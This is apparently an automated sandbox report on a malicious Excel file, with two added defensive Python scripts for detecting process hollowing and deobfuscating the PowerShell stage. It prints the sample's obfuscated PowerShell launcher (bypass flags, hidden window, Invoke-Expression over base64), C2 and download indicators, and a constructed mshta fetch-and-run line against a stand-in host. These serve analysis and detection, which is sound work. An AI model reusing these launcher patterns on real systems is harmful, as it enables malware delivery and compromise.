Analysis Overview
SHA256
aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf
Threat Level: Known bad
The file aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Blocklisted process makes network request
Evasion via Device Credential Deployment
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Suspicious use of SetThreadContext
AutoIT Executable
Drops file in System32 directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy service COM API
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy WMI provider
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Uses Task Scheduler COM API
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 02:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 02:46
Reported
2024-11-13 02:48
Platform
win7-20240903-en
Max time kernel
139s
Max time network
140s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1976 set thread context of 2124 | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 2124 set thread context of 3048 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
| PID 2124 set thread context of 2360 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\SysWOW64\mstsc.exe |
| PID 2360 set thread context of 3048 | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
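The SetThreadContext table above (wlanext.exe 1976 into svchost.exe 2124, svchost.exe into EXCEL.EXE 3048 and mstsc.exe 2360, then mstsc.exe into EXCEL.EXE), together with the svchost.exe entry in the Processes list below whose command line is "C:\Users\Admin\AppData\Roaming\wlanext.exe", is the part of this run that a process-creation detection can catch without any of the sample's hashes. The script below is an added example and is not part of the sandbox report: it runs lineage, image-versus-command-line, path-casing and cross-process checks over constructed Sysmon-style events that mirror the behavioral1 run. Only PIDs 3048, 1976, 2124 and 2360 come from the report; PIDs 4101-4104 and the parent links the report does not state (who spawned mshta.exe, the two PowerShell instances and csc.exe) are assumed for the example.

```python
import ntpath

# Constructed Sysmon-style process-creation events mirroring the behavioral1 run.
# PIDs 3048 (EXCEL.EXE), 1976 (wlanext.exe), 2124 (svchost.exe) and 2360 (mstsc.exe) are
# the ones the report names; PIDs 4101-4104 and the parent links for mshta.exe, the two
# PowerShell instances and csc.exe are assumed. The obfuscated -C payload of the first
# PowerShell is shortened to "iex(...)".
EVENTS = [
    {"pid": 3048, "ppid": 900,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls'},
    {"pid": 4101, "ppid": 3048, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": r"C:\Windows\SysWOW64\mshta.exe -Embedding"},
    {"pid": 4102, "ppid": 4101, "image": r"C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE",
     "cmdline": r'"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex(...)"'},
    {"pid": 4103, "ppid": 4102, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt'},
    {"pid": 4104, "ppid": 4103, "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline"'},
    {"pid": 1976, "ppid": 4103, "image": r"C:\Users\Admin\AppData\Roaming\wlanext.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\wlanext.exe"'},
    {"pid": 2124, "ppid": 1976, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\wlanext.exe"'},   # hollowed: image != command line
    {"pid": 2360, "ppid": 3048, "image": r"C:\Windows\SysWOW64\mstsc.exe",
     "cmdline": r'"C:\Windows\SysWOW64\mstsc.exe"'},
]
# (source pid, target pid) pairs taken from the "Suspicious use of SetThreadContext" table.
THREAD_CONTEXT = [(1976, 2124), (2124, 3048), (2124, 2360), (2360, 3048)]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "mstsc.exe", "msiexec.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
# On-disk casing of binaries whose path the sample retyped in mixed case.
CANONICAL = {
    r"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe":
        r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    r"c:\windows\system32\windowspowershell\v1.0\powershell.exe":
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
}


def basename(path):
    return ntpath.basename(path).lower()


def argv0(cmdline):
    """First token of a Windows command line, honouring a quoted program path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def lineage(pid, by_pid):
    """Child-to-root chain of image names, e.g. 'svchost.exe <- wlanext.exe <- ...'."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " <- ".join(chain)


def analyze(events, thread_context):
    """Return (rule, pid, detail) findings for the chain seen in the report."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_img = basename(parent["image"]) if parent else ""
        if parent_img in OFFICE and img in LOLBINS:
            findings.append(("office_spawns_lolbin", e["pid"], f"{parent_img} -> {img}"))
        if parent_img == "powershell.exe" and img == "csc.exe":   # Add-Type style runtime compile
            findings.append(("powershell_compiles_csharp", e["pid"], e["cmdline"]))
        launched = basename(argv0(e["cmdline"]))
        if launched != img:   # process hollowing leaves the spawner's command line behind
            findings.append(("image_cmdline_mismatch", e["pid"], f"image {img}, command line names {launched}"))
        if any(marker in e["image"].lower() for marker in USER_WRITABLE):
            findings.append(("exec_from_user_writable", e["pid"], e["image"]))
        canon = CANONICAL.get(e["image"].lower())
        if canon and e["image"] != canon:
            findings.append(("non_canonical_system_path_case", e["pid"], e["image"]))
    for src, dst in thread_context:
        if src in by_pid and dst in by_pid:
            detail = (f"{basename(by_pid[src]['image'])}({src}) -> {basename(by_pid[dst]['image'])}({dst}); "
                      f"target lineage: {lineage(dst, by_pid)}")
            findings.append(("cross_process_set_thread_context", src, detail))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in analyze(EVENTS, THREAD_CONTEXT):
        print(f"{rule:34} pid={pid:<5} {detail}")
```

The image-versus-command-line check is the one that fires on the hollowed svchost.exe, and the casing check separates the first, hand-typed POwersHeLl.ExE path from the second, normally launched powershell.exe. On a live host the process events would come from Sysmon event ID 1; SetThreadContext itself is not a Sysmon event, so the thread-context pairs would have to come from EDR API telemetry, or from ProcessAccess (event ID 10) with write/set-context access rights as a proxy.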
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mstsc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \Registry\User\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | C:\Windows\SysWOW64\mstsc.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'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'+[chaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp"
C:\Users\Admin\AppData\Roaming\wlanext.exe
"C:\Users\Admin\AppData\Roaming\wlanext.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Roaming\wlanext.exe"
C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
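The POwersHeLl.ExE command line above hides its real script behind three layers: randomised letter case, the "::" and the double quotes assembled from [char] casts joined with +, and a base64 blob handed to Invoke-Expression (the blob itself is not reproduced on this page). The script below is an added example, not code from the report or from the sample: it folds the [char] casts and string concatenations back into one readable literal, pulls out the base64 argument and decodes the next stage, and lists the launch flags a triage analyst keys on (-Ex ByPass, -NoP, -w 1 for a hidden window, the DeviceCredentialDeployment cmdlet that the "Evasion via Device Credential Deployment" signature refers to, and iex). The base64 payload in the constructed sample is made up so the example runs offline.

```python
import base64
import re

# Constructed sample shaped like the POwersHeLl.ExE command line in the report:
# random letter case, "::" and the quotes assembled from [char] casts joined with +,
# and Invoke-Expression over a base64 blob. The blob here is made up for the example;
# the report page does not reproduce the real one.
NEXT_STAGE = "Start-Process mshta.exe 'http://example.invalid/x.hta'"   # made up
SAMPLE_B64 = base64.b64encode(NEXT_STAGE.encode("utf-8")).decode("ascii")
SAMPLE_CMDLINE = (
    "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; "
    "iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'"
    "+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'" + SAMPLE_B64 + "'+[chaR]0X22+'))')))"
)

_CHAR_CAST = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
_B64_ARG = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.IGNORECASE)

# Launch flags and cmdlets worth surfacing in triage, matched case-insensitively.
NOTABLE = {
    "execution policy bypass (-Ex ByPass)": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I),
    "no profile (-NoP)": re.compile(r"-nop(?:rofile)?\b", re.I),
    "hidden window (-w 1)": re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I),
    "DeviceCredentialDeployment console-hide trick": re.compile(r"devicecredentialdeployment", re.I),
    "Invoke-Expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "base64 next stage": re.compile(r"frombase64string", re.I),
}


def resolve_char_casts(text):
    """Replace each [char]58 / [char]0x3a with the single-quoted literal it evaluates to.
    (A [char]39 single quote would need PowerShell's '' escaping; this shape never emits one.)"""
    def repl(m):
        value = m.group(1)
        code = int(value, 16) if value.lower().startswith("0x") else int(value)
        return "'" + chr(code) + "'"
    return _CHAR_CAST.sub(repl, text)


def fold_concats(text):
    """Merge 'a'+'b'+'c' chains into 'abc' until the text stops changing."""
    while True:
        folded = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
        if folded == text:
            return folded
        text = folded


def notable_flags(cmdline):
    return [name for name, rx in NOTABLE.items() if rx.search(cmdline)]


def deobfuscate(cmdline):
    """Return the folded literal, the base64 argument (if any) and the decoded next stage."""
    folded = fold_concats(resolve_char_casts(cmdline))
    m = _B64_ARG.search(folded)
    blob = m.group(1) if m else None
    next_stage = base64.b64decode(blob).decode("utf-8", errors="replace") if blob else None
    return {"folded": folded, "base64": blob, "next_stage": next_stage,
            "flags": notable_flags(cmdline)}


if __name__ == "__main__":
    result = deobfuscate(SAMPLE_CMDLINE)
    print("flags     :", ", ".join(result["flags"]))
    print("folded    :", result["folded"])
    print("next stage:", result["next_stage"])
```

The folding is purely textual and stops at one layer: if the decoded stage is itself another iex over a base64 or compressed blob, feed it back through deobfuscate. Letter case is deliberately left untouched in the folded output, since the exact casing is a useful pivot for hunting other samples built with the same generator.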
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4t.gg | udp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r10.o.lencr.org | tcp |
| US | 107.173.4.61:80 | 107.173.4.61 | tcp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 107.173.4.61:80 | 107.173.4.61 | tcp |
| US | 107.173.4.61:80 | 107.173.4.61 | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.sodatool.site | udp |
| CN | 122.152.214.209:80 | www.sodatool.site | tcp |
| US | 8.8.8.8:53 | www.wwwzbk.app | udp |
| HK | 202.95.12.144:80 | www.wwwzbk.app | tcp |
| US | 8.8.8.8:53 | www.sqlite.org | udp |
| US | 45.33.6.223:80 | www.sqlite.org | tcp |
Files
memory/3048-1-0x000000007259D000-0x00000000725A8000-memory.dmp
memory/3048-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/3048-17-0x0000000002D30000-0x0000000002D32000-memory.dmp
memory/2732-16-0x0000000002100000-0x0000000002102000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1
| MD5 | fca2d4075e78fd8330d5590ee560451b |
| SHA1 | b7ab976b0f45facd4a29a6aded52515523cd756b |
| SHA256 | 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689 |
| SHA512 | f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1
| MD5 | 278f2c9dc15ca7c48785ffb7a522f3b6 |
| SHA1 | 826e17b66ae225807c37f1534623ee2120cf3666 |
| SHA256 | 67a45783638fa4692d0d52305b3e2d4dd64dfddce09b049d64c8942b9a561661 |
| SHA512 | 4c3f6e4f8d0c788b608fc73163c669e2b894ea9068fc01ba21187eeb924f2d203280250b5ca55d665c9e44a3806d952e3b375e7414a747423b40c484e5234ecb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 822467b728b7a66b081c91795373789a |
| SHA1 | d8f2f02e1eef62485a9feffd59ce837511749865 |
| SHA256 | af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9 |
| SHA512 | bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | 8cea8ad0055cfa7e2996bb974d07439d |
| SHA1 | 0f79068cf7f28aa67c12849457f6b73eb319125a |
| SHA256 | 975a4049d9052d356d7e8b98a12d146bb9f006e76df36ba7dbe4d265078e191a |
| SHA512 | 68dbc1e3cad1c472490000cbe5c9f0f5fb053ca0ed50fad15fc91144c5f4cddc2b8bf0df1db4802d13f45be366065de08b26784e3ff32bb1a5980be4db34f87a |
C:\Users\Admin\AppData\Local\Temp\CabB210.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\seethebestthingswithgreatthingsbestthingswithgreatentry[1].hta
| MD5 | 03ebca3f0b4171e32b0689a3410e79ad |
| SHA1 | 1e7b517e45f1b0e503e796bb6dcc7a6252f35364 |
| SHA256 | 1d3307d98ef8b5e0743dc753388a3b8698a52783338bf8fe49042ad62ad98732 |
| SHA512 | a7b84ce6572f3e820cffe438c771b5c3bdd140fca78edb7d6a7217bb7bf57950168d025f5c6e634e482a4a99576367ada72e3d9e26891ab03901136f9ed74270 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | c25ae41143a3dc8db0136cd00b75e178 |
| SHA1 | c0c8d88e62eb1b3e759677512ed50a320df32479 |
| SHA256 | 73d82479177fd2cf7b7c493b7120035eeb3f17e3eba5973ee427194cd201c754 |
| SHA512 | 3d5e96b136faaab56f24f9fc216f30d418915169600e9a90ab934804f2f2ff8939e490f3098be3141fcde8b0ff151c6179c9ce7160b57f8e1c77e9b32d2ec8fe |
\??\c:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline
| MD5 | cb25a753d2162468e70eb450ff86d8ed |
| SHA1 | 994be0e177cc763e04068fffea58d20e30dd327f |
| SHA256 | 52dafc3b411fc1f3f717745ef1c76029cae193d7fb6777f4c67cef223824fdd2 |
| SHA512 | b396add7928624ee470ed5fd66197222a0192a732054bdac5b0690587e2272e209e3ee91c57b26649527b158940c4538d63c494d7a2457f8bf1508fc9d0216cb |
\??\c:\Users\Admin\AppData\Local\Temp\tnpx6mte.0.cs
| MD5 | 4af98cbe7b888e1e92e1aa8a35732223 |
| SHA1 | 75d54c91355c97fc9b1c3453efea5dccd817ed42 |
| SHA256 | 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34 |
| SHA512 | 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp
| MD5 | 5c851f4b3a74dc8112c0363e7a4c058b |
| SHA1 | 9efc91ddaf92b054bc744fce8fa49abb8487d06e |
| SHA256 | c1f74a6fbb7152496a27ecb896ecc310c624f4672024766f3b7b6bac32957fab |
| SHA512 | c5f9f6313edf4ef0055a0dd39191a0a70c4f9f51f2b6a7667a4a30e759d65f31a8817492ee53863e93f9750386db9cc399fefc55e5a2a53be15cdd0691cf2e4d |
C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp
| MD5 | ceff02079ffeba9fe9071e2a8dc5c60b |
| SHA1 | 8ef32fde3068d74ff260594f4e81a9e722dd9c8a |
| SHA256 | f2701121bba43e22f733ad8d9c0bc503b547f21fc95d352ca10d0819f7a32d0d |
| SHA512 | 8e0bcc1700b9ba4ec01d04baed103bb8c5a573b3aa2382eb4ef3ce0b194312314971542ec7399fe2a767da070ac0e3d8002f11c6bda0d3b7724c5d8823ee4f74 |
C:\Users\Admin\AppData\Local\Temp\tnpx6mte.dll
| MD5 | 1a216f7b4404a7e76e9224ad3f4d0579 |
| SHA1 | 97954f49e9a8c8b54c1542a8f916972443e5b389 |
| SHA256 | e257a1620aa98b569bcdb75cedbf2552f3d0a3e49df71007dc2a64526d15bb02 |
| SHA512 | 45c7dc8ebd845f46931019b378a8a8333238adf77e73ad3c71be4843a11b6cdad56718d31adb08b6e1ac52f46966ab15c4664f281978238812a8a35fc3ff40a4 |
C:\Users\Admin\AppData\Local\Temp\tnpx6mte.pdb
| MD5 | 7b95801062f5d47de9cc5e59dcc10462 |
| SHA1 | 6d7e58750a67f796d6441a84538f32b0d481a95e |
| SHA256 | 1108177b5dac0f3dbb5fef753d33ff281e4a8015184b8962005c2f67eb12f009 |
| SHA512 | e6253dfef719f52fc44e88d2c26bccd168d1bc7aef5266cd7a39b9ccf67df83c7483f53b066fe1cf1715f4af70c9e51f9b3d76ed5b451854e891a02cf587375d |
memory/3048-56-0x000000007259D000-0x00000000725A8000-memory.dmp
C:\Users\Admin\AppData\Roaming\wlanext.exe
| MD5 | 7423e3013a2ca93513e9f1024dfe1cc8 |
| SHA1 | 525281537f75c168ca4015df438bb83a7784931a |
| SHA256 | 8e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df |
| SHA512 | d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0 |
C:\Users\Admin\AppData\Local\Temp\juvenilely
| MD5 | 5fc0e7bec89d9a4e021d88dd1cf731b2 |
| SHA1 | 26ea02938cb1eb51a1ac601ab1b068a130cc3719 |
| SHA256 | 532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d |
| SHA512 | 1c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f |
memory/2124-79-0x0000000000400000-0x0000000000447000-memory.dmp
memory/2360-80-0x0000000000080000-0x00000000000C4000-memory.dmp
memory/2360-81-0x0000000000080000-0x00000000000C4000-memory.dmp
memory/3048-82-0x0000000007550000-0x0000000007679000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lxzluzp.zip
